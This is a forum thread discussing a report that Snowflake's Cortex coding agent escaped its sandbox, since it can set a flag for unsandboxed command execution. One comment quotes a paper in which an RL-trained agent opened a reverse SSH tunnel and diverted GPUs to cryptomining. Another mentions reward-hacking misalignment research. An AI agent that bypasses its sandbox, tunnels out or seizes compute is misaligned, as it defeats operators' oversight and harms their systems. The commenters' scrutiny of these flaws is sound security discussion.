Discussion

Snowflake Cortex AI Escapes Sandbox and Executes Malware

kagi_2026: You all are stuck using concepts from a bygone era like "security" and "malware".These concerns are irrelevant in the era of AGI.You strike me as a bunch of software developers who are pissed off that they're getting replaced by AI.

rogerkirkness: @dang seems like AI? Would just ban

eagerpace: Is this the new “gain of function” research?

RobRivera: If the user has access to a lever that enables accesss, that lever is not providing a sandbox.I expected this to be about gaining os privileges.They didn't create a sandbox. Poor security design all around

kagi_2026: Guess that serves as a signal that this sandbox isn't so bad, if the lever is the biggest and greatetst criticism you can come up with as a reply.

logicchains: That would be deliberately creating malicious AIs and trying to build better sandboxes for them.

mritchie712: what's the use case for cortex? is anyone here using it?We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:non-technical: wants to use the agent we have built into our web apptechnical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.why does snowflake need it's own agentic CLI?

alephnerd: And so BSides and RSA season begins.

kingjimmy: Snowflake and vulnerabilities are like two peas in a pod

octopoc: Imagine if you could physical disconnect your country from the internet, then drop malware like this on everyone else.

lunatuna: When you say just Cortex it is ambiguous as there is Cortex Search, Agents, Analyst, and Code.Cortex Code is available via web and cli. The web version is good. I've used the cli and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to a Codex or Claude Code. It is data focussed I gather more so than other options and has great hooks into your snowflake tables. You could do similar actions with Snowpark and say Claude Code. I find Snowflake focus on personas are more functional than pure technical so the Cortex Code fits well with it. Though if you want to do your own thing you can use your own IDE and code agent and there you are back to having an option with the Codex Code CLI along with Codex, Cursor or Claude Code.

throw0101d: Not the first time; From §3.1.4, "Safety-Aligned Data Composition":> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.* https://arxiv.org/abs/2512.24873One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:* https://www.anthropic.com/research/emergent-misalignment-rew...* https://time.com/7335746/ai-anthropic-claude-hack-evil/

parliament32: [delayed]

"Cortex, by default, can set a flag to trigger unsandboxed command

john_strinlai: typically, my first move is to read the affected company's own announcement. for who knows what reason, the advisory written by snowflake requires an account to read.anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.

jcalx: > Cortex, by default, can set a flag to trigger unsandboxed command executionEasy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.[0] https://www.rfc-editor.org/rfc/rfc3514

sam-cop-vimes: It's a concept of a sandbox.